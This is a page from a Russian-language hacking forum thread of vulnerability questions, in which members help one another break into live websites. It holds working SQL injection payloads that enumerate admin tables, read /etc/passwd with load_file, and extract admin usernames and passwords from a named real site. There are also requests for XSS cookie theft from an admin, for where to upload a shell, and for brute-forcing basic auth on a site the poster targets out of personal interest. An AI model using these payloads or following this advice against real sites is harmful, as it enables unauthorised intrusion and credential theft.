Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(108)+char(95)+char(103)+char(114)+char(111)+char(117)+char(112)+char(95)+char(97)+char(100)+char(109)+char(105)+char(110))--
     
  2. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    скорее всего да.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    2 pinch

    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(108)+char(95)+char(103)+char(114)+char(111)+char(117)+char(112)+char(95)+char(97)+char(100)+char(109)+char(105)+char(110))--

    syntaxe incorrecte vers 'char'.
     
    _________________________
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    Попробуй

    load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100))
     
    _________________________
  5. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    Из прошлого запроса видно что ковычка не фильтруется.
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    на encode не пробовал
    заменив "+" на "%2B"
    скорее всего причина в этом

    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
     
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    2 pinch

    nea,тот же результат =(
     
    _________________________
  8. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    427
    Likes Received:
    46
    Reputations:
    40
    интересно может ссылку дашь....
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    в личку
     
    _________________________
  10. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    206
    Likes Received:
    92
    Reputations:
    11
    А мне кто поможет?
     
  11. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Создавать то создавал, но потом в описании раздела увидел, что нельзя, через день удалили тред.

    Кинули ссылку на ман по тому как сделать, а я пока скорее нахожусь на уровне скрипт - кидди)

    Из википедии понял только что шифрование на Base64, никаких уязвимостей там не написано.

    ЗЫ: мой вопрос на странице 1293
     
    #12731 ReckouNT, 6 May 2010
    Last edited: 6 May 2010
  12. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Подскажите как вытащить cookies с сайта, есть XSS уязвимость, задача вытащить cookies админа, испробавала пока на себе (document.cookie(JS)) нормально вытаскивает и записывает но одна проблема всего 4 значения а их там 6... т.е не все полностью тащит, есть еще какие то варианты?
     
  13. oko

    oko New Member

    Joined:
    1 May 2010
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Оказывается надо было просто аворитизироваться, и появится все параметры, вопрос закрыт
     
  14. Rabben

    Rabben New Member

    Joined:
    27 Mar 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Исправьте запрос, никак не могу вывести таблицу
    http://blocked/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
     
    #12734 Rabben, 7 May 2010
    Last edited: 7 May 2010
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://ping.ua/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,admin_username,admin_password)+from+se_admins+limit+0,1),floor(rand(0)*2))+from+se_admins+group+by+2)a)--+
    
    последняя единичка в каждом результате лишняя
     
  16. burn90

    burn90 New Member

    Joined:
    5 May 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    а как узнать куда его заливать. те где находятся файлы сайта :)
     
  17. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Ап
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    378
    Likes Received:
    346
    Reputations:
    292
    ReckouNT забей..
     
    _________________________
  19. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.
     
    1 person likes this.
  20. ReckouNT

    ReckouNT New Member

    Joined:
    16 Jan 2009
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Не могу, к данному сайту личный интерес. К тому же там большая база юзверей и он самописный, дырок должно быть дофига.

    Очень жаль, я надеялся что к такому старому способу что либо придумали. Брут там использовать очень легко.
    Ладно, придется либо брутить, либо искать новую уязвимость.
    =======
    Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.

    На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.
     
Loading...
Thread Status:
Not open for further replies.